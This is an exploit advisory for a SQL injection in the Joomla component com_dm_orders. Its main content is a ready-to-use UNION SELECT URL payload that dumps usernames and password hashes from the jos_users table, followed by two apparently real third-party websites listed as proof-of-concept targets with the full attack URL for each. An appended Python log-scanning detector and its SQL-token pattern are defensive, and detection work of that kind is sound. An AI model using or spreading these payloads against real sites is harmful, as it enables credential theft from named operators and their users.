==============================================================================
 [o] Joomla Components [ com_dm_orders ] SQL Injection Vulnerability

       Software : com_dm_orders [ joomla components ]
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com/
==============================================================================

 [o] Exploit

       http://localhost/[path]/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=1

 [o] Proof of Concept

       http://www.yourownconsultingbusiness.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=54
       http://www.shop.isecure-key.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=54

==============================================================================

 [o] Greetz

       Anti Security [ http://antisecurity.org ]
       Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe H312Y yooogy mousekill
       }^-^{ martfella noname s4va skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

==============================================================================
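
 [o] Detection (added example, not part of the original advisory)

       The injection above rides in the id parameter of com_dm_orders requests, so access logs
       can be checked for any such request whose decoded id is not a plain integer. The log
       lines, addresses and the "integer-only id" rule below are assumptions for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); IPs are documentation addresses.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=12&Itemid=1 HTTP/1.1" 200 5120
192.0.2.44 - - [01/Jan/2010:10:00:05 +0000] "GET /index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=1 HTTP/1.1" 200 7344
192.0.2.44 - - [01/Jan/2010:10:00:09 +0000] "GET /index.php?option=com_dm_orders&task=order_form&id=%2d1%20UNION%20SELECT%201 HTTP/1.1" 200 900
192.0.2.10 - - [01/Jan/2010:10:00:12 +0000] "GET /index.php?option=com_content&id=7 HTTP/1.1" 200 4100
"""

# Client address and request target from one log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Tokens seen in the advisory's payload; used only to annotate a finding, not to decide it.
SQL_TOKENS = re.compile(r"\b(union|select|group_concat|from)\b|--|0x[0-9a-f]+", re.I)
# Assumption: a legitimate order id is a plain non-negative integer.
VALID_ID = re.compile(r"[0-9]+")


def suspicious_requests(log_text):
    """Return com_dm_orders requests whose decoded id is not an integer."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qs decodes both '+' and %XX, so encoded variants are compared in clear form.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if params.get("option", [""])[0].lower() != "com_dm_orders":
            continue
        for value in params.get("id", []):
            if VALID_ID.fullmatch(value):
                continue
            tokens = sorted({t.group(0).lower() for t in SQL_TOKENS.finditer(value)})
            findings.append({"client": client, "id": value, "sql_tokens": tokens})
    return findings


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit["client"], hit["sql_tokens"], hit["id"])
```

       The allow-list on id decides the finding; the token list only helps triage. The same
       integer-only rule belongs in the component itself, together with a parameterised query.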